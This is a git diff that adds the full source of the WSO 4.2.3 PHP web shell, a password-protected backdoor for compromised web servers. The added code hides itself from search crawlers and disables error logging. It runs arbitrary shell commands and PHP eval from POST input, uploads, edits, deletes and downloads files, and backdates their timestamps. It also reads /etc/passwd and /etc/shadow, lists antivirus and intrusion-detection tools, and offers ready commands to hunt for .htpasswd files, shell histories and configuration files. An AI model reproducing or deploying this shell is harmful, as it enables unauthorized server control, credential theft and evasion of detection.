diff --git a/php/wso/wso-4.2.3.php b/php/wso/wso-4.2.3.php new file mode 100644 index 0000000..e2c085d --- /dev/null +++ b/php/wso/wso-4.2.3.php @@ -0,0 +1,1623 @@ +=strlen($str))break;}}return base64_decode($enc_str);} +@ini_set('error_log',NULL); +@ini_set('log_errors',0); +@ini_set('max_execution_time',0); +@set_time_limit(0); +@set_magic_quotes_runtime(0); +@define('VERSION', '4.2.3'); +if(get_magic_quotes_gpc()) { + function stripslashes_array($array) { + return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); + } + $_POST = stripslashes_array($_POST); + $_COOKIE = stripslashes_array($_COOKIE); +} +/* (С) 11.2011 oRb */ +if(!empty($▛)) { + if(isset($_POST['pass']) && (md5($_POST['pass']) == $▛)) + prototype(md5($_SERVER['HTTP_HOST']), $▛); + if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $▛)) + hardLogin(); +} +if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) + $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$▘; +function hardLogin() { + if(!empty($_SERVER['HTTP_USER_AGENT'])) { + $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); + if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { + header('HTTP/1.0 404 Not Found'); + exit; + } + } + die("
Password:
"); +} +if(strtolower(substr(PHP_OS,0,3)) == "win") + $os = 'win'; +else + $os = 'nix'; +$safe_mode = @ini_get('safe_mode'); +if(!$safe_mode) + error_reporting(0); +$disable_functions = @ini_get('disable_functions'); +$home_cwd = @getcwd(); +if(isset($_POST['c'])) + @chdir($_POST['c']); +$cwd = @getcwd(); +if($os == 'win') { + $home_cwd = str_replace("\\", "/", $home_cwd); + $cwd = str_replace("\\", "/", $cwd); +} +if($cwd[strlen($cwd)-1] != '/') + $cwd .= '/'; +/* (С) 04.2015 Pirat */ +function hardHeader() { + if(empty($_POST['charset'])) + $_POST['charset'] = $GLOBALS['▜']; + echo "" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ." + + +
+
+ + + + + + +
"; + $freeSpace = @diskfreespace($GLOBALS['cwd']); + $totalSpace = @disk_total_space($GLOBALS['cwd']); + $totalSpace = $totalSpace?$totalSpace:1; + $release = @php_uname('r'); + $kernel = @php_uname('s'); + $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description='; + if(strpos('Linux', $kernel) !== false) + $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); + else + $explink .= urlencode($kernel . ' ' . substr($release,0,3)); + if(!function_exists('posix_getegid')) { + $user = @get_current_user(); + $uid = @getmyuid(); + $gid = @getmygid(); + $group = "?"; + } else { + $uid = @posix_getpwuid(@posix_geteuid()); + $gid = @posix_getgrgid(@posix_getegid()); + $user = $uid['name']; + $uid = $uid['uid']; + $group = $gid['name']; + $gid = $gid['gid']; + } + $cwd_links = ''; + $path = explode("/", $GLOBALS['cwd']); + $n=count($path); + for($i=0; $i<$n-1; $i++) { + $cwd_links .= "".$path[$i]."/"; + } + $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); + $opt_charsets = ''; + foreach($charsets as $▟) + $opt_charsets .= ''; + $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); + if(!empty($GLOBALS['▛'])) + $m['Logout'] = 'Logout'; + $m['Self remove'] = 'SelfRemove'; + $menu = ''; + foreach($m as $k => $v) + $menu .= '[ '.$k.' ]'; + $drives = ""; + if ($GLOBALS['os'] == 'win') { + foreach(range('c','z') as $drive) + if (is_dir($drive.':\\')) + $drives .= '[ '.$drive.' ] '; + } + /* (С) 08.2015 dmkcv */ + echo ''. + ''. + '
Uname:
User:
Php:
Hdd:
Cwd:'.($GLOBALS['os'] == 'win'?'
Drives:':'').'
'.substr(@php_uname(), 0, 120).' [ Google ] [ Exploit-DB ]
'.$uid.' ( '.$user.' ) Group: '.$gid.' ( ' .$group. ' )
'.@phpversion().' Safe mode: '.($GLOBALS['safe_mode']?'ON':'OFF').' [ phpinfo ] Datetime: '.date('Y-m-d H:i:s').'
'.viewSize($totalSpace).' Free: '.viewSize($freeSpace).' ('.round(100/($totalSpace/$freeSpace),2).'%)
'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' [ home ]
'.$drives.'

Server IP:
'.gethostbyname($_SERVER["HTTP_HOST"]).'
Client IP:
'.$_SERVER['REMOTE_ADDR'].'
'. + ''.$menu.'
'; +} +function hardFooter() { + $is_writable = is_writable($GLOBALS['cwd'])?" [ Writeable ]":" (Not writable)"; + echo " +
+ + + + + + + + + + +
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
+ + + + + + Upload file:$is_writable

"; +} +if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } +if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } +function ex($in) { + $▖ = ''; + if (function_exists('exec')) { + @exec($in,$▖); + $▖ = @join("\n",$▖); + } elseif (function_exists('passthru')) { + ob_start(); + @passthru($in); + $▖ = ob_get_clean(); + } elseif (function_exists('system')) { + ob_start(); + @system($in); + $▖ = ob_get_clean(); + } elseif (function_exists('shell_exec')) { + $▖ = shell_exec($in); + } elseif (is_resource($f = @popen($in,"r"))) { + $▖ = ""; + while(!@feof($f)) + $▖ .= fread($f,1024); + pclose($f); + }else return "↳ Unable to execute command\n"; + return ($▖==''?"↳ Query did not return anything\n":$▖); +} +function viewSize($s) { + if($s >= 1073741824) + return sprintf('%1.2f', $s / 1073741824 ). ' GB'; + elseif($s >= 1048576) + return sprintf('%1.2f', $s / 1048576 ) . ' MB'; + elseif($s >= 1024) + return sprintf('%1.2f', $s / 1024 ) . ' KB'; + else + return $s . ' B'; +} +function perms($p) { + if (($p & 0xC000) == 0xC000)$i = 's'; + elseif (($p & 0xA000) == 0xA000)$i = 'l'; + elseif (($p & 0x8000) == 0x8000)$i = '-'; + elseif (($p & 0x6000) == 0x6000)$i = 'b'; + elseif (($p & 0x4000) == 0x4000)$i = 'd'; + elseif (($p & 0x2000) == 0x2000)$i = 'c'; + elseif (($p & 0x1000) == 0x1000)$i = 'p'; + else $i = 'u'; + $i .= (($p & 0x0100) ? 'r' : '-'); + $i .= (($p & 0x0080) ? 'w' : '-'); + $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); + $i .= (($p & 0x0020) ? 'r' : '-'); + $i .= (($p & 0x0010) ? 'w' : '-'); + $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); + $i .= (($p & 0x0004) ? 'r' : '-'); + $i .= (($p & 0x0002) ? 'w' : '-'); + $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); + return $i; +} +function viewPermsColor($f) { + if (!@is_readable($f)) + return ''.perms(@fileperms($f)).''; + elseif (!@is_writable($f)) + return ''.perms(@fileperms($f)).''; + else + return ''.perms(@fileperms($f)).''; +} +function hardScandir($dir) { + if(function_exists("scandir")) { + return scandir($dir); + } else { + $dh = opendir($dir); + while (false !== ($filename = readdir($dh))) + $files[] = $filename; + return $files; + } +} +function which($p) { + $path = ex('which ' . $p); + if(!empty($path)) + return $path; + return false; +} +function actionRC() { + if(!@$_POST['p1']) { + $a = array( + "uname" => php_uname(), + "php_version" => phpversion(), + "VERSION" => VERSION, + "safemode" => @ini_get('safe_mode') + ); + echo serialize($a); + } else { + eval($_POST['p1']); + } +} +function prototype($k, $v) { + $_COOKIE[$k] = $v; + setcookie($k, $v); +} +function actionSecInfo() { + hardHeader(); + echo '

Server security information

'; + function showSecParam($n, $v) { + $v = trim($v); + if($v) { + echo '' . $n . ': '; + if(strpos($v, "\n") === false) + echo $v . '
'; + else + echo '
' . $v . '
'; + } + } + showSecParam('Server software', @getenv('SERVER_SOFTWARE')); + if(function_exists('apache_get_modules')) + showSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); + showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); + showSecParam('Open base dir', @ini_get('open_basedir')); + showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); + showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); + showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); + $temp=array(); + if(function_exists('mysql_get_client_info')) + $temp[] = "MySql (".mysql_get_client_info().")"; + if(function_exists('mssql_connect')) + $temp[] = "MSSQL"; + if(function_exists('pg_connect')) + $temp[] = "PostgreSQL"; + if(function_exists('oci_connect')) + $temp[] = "Oracle"; + showSecParam('Supported databases', implode(', ', $temp)); + echo '
'; + if($GLOBALS['os'] == 'nix') { + showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); + showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); + showSecParam('OS version', @file_get_contents('/proc/version')); + showSecParam('Distr name', @file_get_contents('/etc/issue.net')); + if(!$GLOBALS['safe_mode']) { + $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); + $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); + $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); + echo '
'; + $temp=array(); + foreach ($userful as $▟) + if(which($▟)) + $temp[] = $▟; + showSecParam('Userful', implode(', ',$temp)); + $temp=array(); + foreach ($danger as $▟) + if(which($▟)) + $temp[] = $▟; + showSecParam('Danger', implode(', ',$temp)); + $temp=array(); + foreach ($downloaders as $▟) + if(which($▟)) + $temp[] = $▟; + showSecParam('Downloaders', implode(', ',$temp)); + echo '
'; + showSecParam('HDD space', ex('df -h')); + showSecParam('Hosts', @file_get_contents('/etc/hosts')); + showSecParam('Mount options', @file_get_contents('/etc/fstab')); + } + } else { + showSecParam('OS Version',ex('ver')); + showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts'))); + showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user'))); + } + echo '
'; + hardFooter(); +} +function actionFilesTools() { + if( isset($_POST['p1']) ) + $_POST['p1'] = urldecode($_POST['p1']); + if(@$_POST['p2']=='download') { + if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { + ob_start("ob_gzhandler", 4096); + header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); + if (function_exists("mime_content_type")) { + $type = @mime_content_type($_POST['p1']); + header("Content-Type: " . $type); + } else + header("Content-Type: application/octet-stream"); + $fp = @fopen($_POST['p1'], "r"); + if($fp) { + while(!@feof($fp)) + echo @fread($fp, 1024); + fclose($fp); + } + }exit; + } + if( @$_POST['p2'] == 'mkfile' ) { + if(!file_exists($_POST['p1'])) { + $fp = @fopen($_POST['p1'], 'w'); + if($fp) { + $_POST['p2'] = "edit"; + fclose($fp); + } + } + } + hardHeader(); + echo '

File tools

'; + if( !file_exists(@$_POST['p1']) ) { + echo 'File not exists'; + hardFooter(); + return; + } + $uid = @posix_getpwuid(@fileowner($_POST['p1'])); + if(!$uid) { + $uid['name'] = @fileowner($_POST['p1']); + $gid['name'] = @filegroup($_POST['p1']); + } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); + echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' Permission: '.viewPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].'
'; + echo 'Create time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'

'; + if( empty($_POST['p2']) ) + $_POST['p2'] = 'view'; + if( is_file($_POST['p1']) ) + $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch', 'Frame'); + else + $m = array('Chmod', 'Rename', 'Touch'); + foreach($m as $v) + echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' '; + echo '

'; + switch($_POST['p2']) { + case 'view': + echo '
';
+			$fp = @fopen($_POST['p1'], 'r');
+			if($fp) {
+				while( !@feof($fp) )
+					echo htmlspecialchars(@fread($fp, 1024));
+				@fclose($fp);
+			}
+			echo '
'; + break; + case 'highlight': + if( @is_readable($_POST['p1']) ) { + echo '
'; + $oRb = @highlight_file($_POST['p1'],true); + echo str_replace(array(''), array(''),$oRb).'
'; + } + break; + case 'chmod': + if( !empty($_POST['p3']) ) { + $perms = 0; + for($i=strlen($_POST['p3'])-1;$i>=0;--$i) + $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); + if(!@chmod($_POST['p1'], $perms)) + echo 'Can\'t set permissions!
'; + } + clearstatcache(); + echo '
'; + break; + case 'edit': + if( !is_writable($_POST['p1'])) { + echo 'File isn\'t writeable'; + break; + } + if( !empty($_POST['p3']) ) { + $time = @filemtime($_POST['p1']); + $_POST['p3'] = substr($_POST['p3'],1); + $fp = @fopen($_POST['p1'],"w"); + if($fp) { + @fwrite($fp,$_POST['p3']); + @fclose($fp); + echo 'Saved!
'; + @touch($_POST['p1'],$time,$time); + } + } + echo '
'; + break; + case 'hexdump': + $c = @file_get_contents($_POST['p1']); + $n = 0; + $h = array('00000000
','',''); + $len = strlen($c); + for ($i=0; $i<$len; ++$i) { + $h[1] .= sprintf('%02X',ord($c[$i])).' '; + switch ( ord($c[$i]) ) { + case 0: $h[2] .= ' '; break; + case 9: $h[2] .= ' '; break; + case 10: $h[2] .= ' '; break; + case 13: $h[2] .= ' '; break; + default: $h[2] .= $c[$i]; break; + } + $n++; + if ($n == 32) { + $n = 0; + if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'
';} + $h[1] .= '
'; + $h[2] .= "\n"; + } + } + echo '
'.$h[0].'
'.$h[1].'
'.htmlspecialchars($h[2]).'
'; + break; + case 'rename': + if( !empty($_POST['p3']) ) { + if(!@rename($_POST['p1'], $_POST['p3'])) + echo 'Can\'t rename!
'; + else + die(''); + } + echo '
'; + break; + case 'touch': + if( !empty($_POST['p3']) ) { + $time = strtotime($_POST['p3']); + if($time) { + if(!touch($_POST['p1'],$time,$time)) + echo 'Fail!'; + else + echo 'Touched!'; + } else echo 'Bad time format!'; + } + clearstatcache(); + echo '
'; + break; + /* (С) 12.2015 mitryz */ + case 'frame': + $frameSrc = substr(htmlspecialchars($GLOBALS['cwd']), strlen(htmlspecialchars($_SERVER['DOCUMENT_ROOT']))); + if ($frameSrc[0] != '/') + $frameSrc = '/' . $frameSrc; + if ($frameSrc[strlen($frameSrc) - 1] != '/') + $frameSrc = $frameSrc . '/'; + $frameSrc = $frameSrc . htmlspecialchars($_POST['p1']); + echo ''; + break; + } + echo '
'; + hardFooter(); +} +if($os == 'win') + $aliases = array( + "List Directory" => "dir", + "Find index.php in current dir" => "dir /s /w /b index.php", + "Find *config*.php in current dir" => "dir /s /w /b *config*.php", + "Show active connections" => "netstat -an", + "Show running services" => "net start", + "User accounts" => "net user", + "Show computers" => "net view", + "ARP Table" => "arp -a", + "IP Configuration" => "ipconfig /all" + ); +else + $aliases = array( + "List dir" => "ls -lha", + "list file attributes on a Linux second extended file system" => "lsattr -va", + "show opened ports" => "netstat -an | grep -i listen", + "process status" => "ps aux", + "Find" => "", + "find all suid files" => "find / -type f -perm -04000 -ls", + "find suid files in current dir" => "find . -type f -perm -04000 -ls", + "find all sgid files" => "find / -type f -perm -02000 -ls", + "find sgid files in current dir" => "find . -type f -perm -02000 -ls", + "find config.inc.php files" => "find / -type f -name config.inc.php", + "find config* files" => "find / -type f -name \"config*\"", + "find config* files in current dir" => "find . -type f -name \"config*\"", + "find all writable folders and files" => "find / -perm -2 -ls", + "find all writable folders and files in current dir" => "find . -perm -2 -ls", + "find all service.pwd files" => "find / -type f -name service.pwd", + "find service.pwd files in current dir" => "find . -type f -name service.pwd", + "find all .htpasswd files" => "find / -type f -name .htpasswd", + "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", + "find all .bash_history files" => "find / -type f -name .bash_history", + "find .bash_history files in current dir" => "find . -type f -name .bash_history", + "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", + "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", + "Locate" => "", + "locate httpd.conf files" => "locate httpd.conf", + "locate vhosts.conf files" => "locate vhosts.conf", + "locate proftpd.conf files" => "locate proftpd.conf", + "locate psybnc.conf files" => "locate psybnc.conf", + "locate my.conf files" => "locate my.conf", + "locate admin.php files" =>"locate admin.php", + "locate cfg.php files" => "locate cfg.php", + "locate conf.php files" => "locate conf.php", + "locate config.dat files" => "locate config.dat", + "locate config.php files" => "locate config.php", + "locate config.inc files" => "locate config.inc", + "locate config.inc.php" => "locate config.inc.php", + "locate config.default.php files" => "locate config.default.php", + "locate config* files " => "locate config", + "locate .conf files"=>"locate '.conf'", + "locate .pwd files" => "locate '.pwd'", + "locate .sql files" => "locate '.sql'", + "locate .htpasswd files" => "locate '.htpasswd'", + "locate .bash_history files" => "locate '.bash_history'", + "locate .mysql_history files" => "locate '.mysql_history'", + "locate .fetchmailrc files" => "locate '.fetchmailrc'", + "locate backup files" => "locate backup", + "locate dump files" => "locate dump", + "locate priv files" => "locate priv" + ); +function actionConsole() { + if(!empty($_POST['p1']) && !empty($_POST['p2'])) { + prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); + $_POST['p1'] .= ' 2>&1'; + } elseif(!empty($_POST['p1'])) + prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); + if(isset($_POST['ajax'])) { + prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); + ob_start(); + echo "d.cf.cmd.value='';\n"; + $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0")); + if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { + if(@chdir($match[1])) { + $GLOBALS['cwd'] = @getcwd(); + echo "c_='".$GLOBALS['cwd']."';"; + } + } + echo "d.cf.output.value+='".$temp."';"; + echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; + $temp = ob_get_clean(); + echo strlen($temp), "\n", $temp; + exit; + } + if(empty($_POST['ajax'])&&!empty($_POST['p1'])) + prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); + hardHeader(); + echo ""; + echo '

Console

send using AJAX redirect stderr to stdout (2>&1)
$
'; + echo '
'; + hardFooter(); +} +function actionPhp() { + if( isset($_POST['ajax']) ) { + $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true; + ob_start(); + eval($_POST['p1']); + $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; + echo strlen($temp), "\n", $temp; + exit; + } + hardHeader(); + if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { + echo '

PHP info

'; + ob_start(); + phpinfo(); + $tmp = ob_get_clean(); + $tmp = preg_replace('!body {.*}!msiU','',$tmp); + $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); + $tmp = preg_replace('!h1!msiU','h2',$tmp); + $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); + $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); + echo $tmp; + echo '

'; + } + if(empty($_POST['ajax'])&&!empty($_POST['p1'])) + $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false; + echo '

Execution PHP-code

'; + echo ' send using AJAX
';
+	if(!empty($_POST['p1'])) {
+		ob_start();
+		eval($_POST['p1']);
+		echo htmlspecialchars(ob_get_clean());
+	}
+	echo '
'; + hardFooter(); +} +function actionFilesMan() { + if (!empty ($_COOKIE['f'])) + $_COOKIE['f'] = @unserialize($_COOKIE['f']); + + if(!empty($_POST['p1'])) { + switch($_POST['p1']) { + case 'uploadFile': + if ( is_array($_FILES['f']['tmp_name']) ) { + foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) { + if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) { + echo "Can't upload file!"; + } + } + } + break; + case 'mkdir': + if(!@mkdir($_POST['p2'])) + echo "Can't create new dir"; + break; + case 'delete': + function deleteDir($path) { + $path = (substr($path,-1)=='/') ? $path:$path.'/'; + $dh = opendir($path); + while ( ($▟ = readdir($dh) ) !== false) { + $▟ = $path.$▟; + if ( (basename($▟) == "..") || (basename($▟) == ".") ) + continue; + $type = filetype($▟); + if ($type == "dir") + deleteDir($▟); + else + @unlink($▟); + } + closedir($dh); + @rmdir($path); + } + if(is_array(@$_POST['f'])) + foreach($_POST['f'] as $f) { + if($f == '..') + continue; + $f = urldecode($f); + if(is_dir($f)) + deleteDir($f); + else + @unlink($f); + } + break; + case 'paste': + if($_COOKIE['act'] == 'copy') { + function copy_paste($c,$s,$d){ + if(is_dir($c.$s)){ + mkdir($d.$s); + $h = @opendir($c.$s); + while (($f = @readdir($h)) !== false) + if (($f != ".") and ($f != "..")) + copy_paste($c.$s.'/',$f, $d.$s.'/'); + } elseif(is_file($c.$s)) + @copy($c.$s, $d.$s); + } + foreach($_COOKIE['f'] as $f) + copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); + } elseif($_COOKIE['act'] == 'move') { + function move_paste($c,$s,$d){ + if(is_dir($c.$s)){ + mkdir($d.$s); + $h = @opendir($c.$s); + while (($f = @readdir($h)) !== false) + if (($f != ".") and ($f != "..")) + copy_paste($c.$s.'/',$f, $d.$s.'/'); + } elseif(@is_file($c.$s)) + @copy($c.$s, $d.$s); + } + foreach($_COOKIE['f'] as $f) + @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); + } elseif($_COOKIE['act'] == 'zip') { + if(class_exists('ZipArchive')) { + $zip = new ZipArchive(); + if ($zip->open($_POST['p2'], 1)) { + chdir($_COOKIE['c']); + foreach($_COOKIE['f'] as $f) { + if($f == '..') + continue; + if(@is_file($_COOKIE['c'].$f)) + $zip->addFile($_COOKIE['c'].$f, $f); + elseif(@is_dir($_COOKIE['c'].$f)) { + $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); + foreach ($iterator as $key=>$value) { + $zip->addFile(realpath($key), $key); + } + } + } + chdir($GLOBALS['cwd']); + $zip->close(); + } + } + } elseif($_COOKIE['act'] == 'unzip') { + if(class_exists('ZipArchive')) { + $zip = new ZipArchive(); + foreach($_COOKIE['f'] as $f) { + if($zip->open($_COOKIE['c'].$f)) { + $zip->extractTo($GLOBALS['cwd']); + $zip->close(); + } + } + } + } elseif($_COOKIE['act'] == 'tar') { + chdir($_COOKIE['c']); + $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); + ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); + chdir($GLOBALS['cwd']); + } + unset($_COOKIE['f']); + setcookie('f', '', time() - 3600); + break; + default: + if(!empty($_POST['p1'])) { + prototype('act', $_POST['p1']); + prototype('f', serialize(@$_POST['f'])); + prototype('c', @$_POST['c']); + } + break; + } + } + hardHeader(); + echo '

File manager

'; + $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); + if($dirContent === false) { echo 'Can\'t open this folder!';hardFooter(); return; } + global $sort; + $sort = array('name', 1); + if(!empty($_POST['p1'])) { + if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) + $sort = array($match[1], (int)$match[2]); + } +echo " + +"; + $dirs = $files = array(); + $n = count($dirContent); + for($i=0;$i<$n;$i++) { + $ow = @posix_getpwuid(@fileowner($dirContent[$i])); + $gr = @posix_getgrgid(@filegroup($dirContent[$i])); + $tmp = array('name' => $dirContent[$i], + 'path' => $GLOBALS['cwd'].$dirContent[$i], + 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), + 'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]), + 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), + 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), + 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) + ); + if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) + $files[] = array_merge($tmp, array('type' => 'file')); + elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) + $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); + elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&&($dirContent[$i] != ".")) + $dirs[] = array_merge($tmp, array('type' => 'dir')); + } + $GLOBALS['sort'] = $sort; + function cmp($a, $b) { + if($GLOBALS['sort'][0] != 'size') + return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); + else + return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); + } + usort($files, "cmp"); + usort($dirs, "cmp"); + $files = array_merge($dirs, $files); + $l = 0; + foreach($files as $f) { + echo ''; + $l = $l?0:1; + } + echo "
NameSizeModifyOwner/GroupPermissionsActions
'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '>[ ' . htmlspecialchars($f['name']) . ' ]').''.(($f['type']=='file')?viewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'] + .'R T'.(($f['type']=='file')?' F E D':'').'
+ + + + + "; + if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) + echo " file name:  "; + echo "
"; + hardFooter(); +} +function actionStringTools() { + if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} + if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} + if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i 'base64_encode', + 'Base64 decode' => 'base64_decode', + 'Url encode' => 'urlencode', + 'Url decode' => 'urldecode', + 'Full urlencode' => 'full_urlencode', + 'md5 hash' => 'md5', + 'sha1 hash' => 'sha1', + 'crypt' => 'crypt', + 'CRC32' => 'crc32', + 'ASCII to HEX' => 'ascii2hex', + 'HEX to ASCII' => 'hex2ascii', + 'HEX to DEC' => 'hexdec', + 'HEX to BIN' => 'hex2bin', + 'DEC to HEX' => 'dechex', + 'DEC to BIN' => 'decbin', + 'BIN to HEX' => 'binhex', + 'BIN to DEC' => 'bindec', + 'String to lower case' => 'strtolower', + 'String to upper case' => 'strtoupper', + 'Htmlspecialchars' => 'htmlspecialchars', + 'String length' => 'strlen', + ); + if(isset($_POST['ajax'])) { + prototype(md5($_SERVER['HTTP_HOST']).'ajax', true); + ob_start(); + if(in_array($_POST['p1'], $stringTools)) + echo $_POST['p1']($_POST['p2']); + $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; + echo strlen($temp), "\n", $temp; + exit; + } + if(empty($_POST['ajax'])&&!empty($_POST['p1'])) + prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0); + hardHeader(); + echo '

String conversions

'; + echo "
send using AJAX
";
+	if(!empty($_POST['p1'])) {
+		if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
+	}
+	echo"

Search files:

+
+ + + + +
Text:
Path:
Name:
"; + function hardRecursiveGlob($path) { + if(substr($path, -1) != '/') + $path.='/'; + $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); + if(is_array($paths)&&@count($paths)) { + foreach($paths as $▟) { + if(@is_dir($▟)){ + if($path!=$▟) + hardRecursiveGlob($▟); + } else { + if(empty($_POST['p2']) || @strpos(file_get_contents($▟), $_POST['p2'])!==false) + echo "".htmlspecialchars($▟)."
"; + } + } + } + } + if(@$_POST['p3']) + hardRecursiveGlob($_POST['c']); + echo "

Search for hash:

+
+
+ +
+
+
+
+
+
+
+
+
